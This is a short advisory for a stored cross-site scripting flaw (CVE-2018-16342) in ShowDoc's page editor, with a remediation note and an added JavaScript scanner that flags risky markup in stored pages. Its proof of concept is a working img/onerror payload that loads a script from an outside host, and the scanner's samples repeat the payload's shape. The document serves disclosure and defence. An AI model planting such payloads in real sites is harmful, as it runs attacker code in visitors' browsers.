Cross-site Scripting (XSS) Vulnerability in the showdoc/showdoc library - CVE-2018-16342

Overview

ShowDoc v1.8.0 is vulnerable to stored XSS in the "Create a new page" function.

PoC

Type this payload in the body of the new page:

 <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>

Remediation

Update to ShowDoc v1.8.2
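
An audit for stored page bodies that contain markup of the PoC's shape, added here as an example (it is not ShowDoc code). It assumes page bodies are available as strings; `findActiveMarkup`, `SAMPLE_PAGES` and the `example.invalid` URL are constructed for illustration.

```javascript
// Added example, not ShowDoc code. Names and sample pages are constructed.
const RISKY_TAGS = new Set(['script', 'iframe', 'object', 'embed']);
const URL_ATTRS = new Set(['src', 'href', 'action', 'formaction', 'data']);
// One attribute: name, then optional "quoted", 'quoted' or unquoted value
// (the PoC uses unquoted values, which end at whitespace or ">").
const ATTR = /([^\s>\/][^\s=>\/]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/y;

// Findings for one page body: risky elements, on* handlers, javascript: URLs.
function findActiveMarkup(html) {
  const findings = [];
  const tagOpen = /<([a-zA-Z][^\s\/>]*)/g;
  let m;
  while ((m = tagOpen.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (RISKY_TAGS.has(tag)) findings.push({ tag, reason: 'element' });
    let i = tagOpen.lastIndex;
    while (i < html.length && html[i] !== '>') {
      if (/[\s\/]/.test(html[i])) { i++; continue; }
      ATTR.lastIndex = i;
      const a = ATTR.exec(html);
      i = ATTR.lastIndex;
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (name.startsWith('on')) findings.push({ tag, reason: 'handler:' + name });
      // Entity-encoded values are not decoded; treat findings as review leads.
      const url = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
      if (URL_ATTRS.has(name) && url.startsWith('javascript:')) {
        findings.push({ tag, reason: 'js-url:' + name });
      }
    }
    tagOpen.lastIndex = i; // resume after the tag so quoted "<script>" is not re-read
  }
  return findings;
}

// Constructed bodies; "poc-shape" mirrors the structure of the PoC payload.
const SAMPLE_PAGES = {
  'api-notes': '# API\n\nUse `GET /items` to list items. <b>Bold</b> is fine.',
  'poc-shape': "<img src=x onerror=s=createElement('script');body.appendChild(s);" +
    "s.src='https://example.invalid/x.js';>",
  'mixed': '<a title="<script>" HREF=" JavaScript:void(0)">x</a><svg/onload=1>',
};
for (const [name, body] of Object.entries(SAMPLE_PAGES)) {
  console.log(name, JSON.stringify(findActiveMarkup(body)));
}
```

The scanner does not parse Markdown, so markup quoted inside code spans is reported too.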
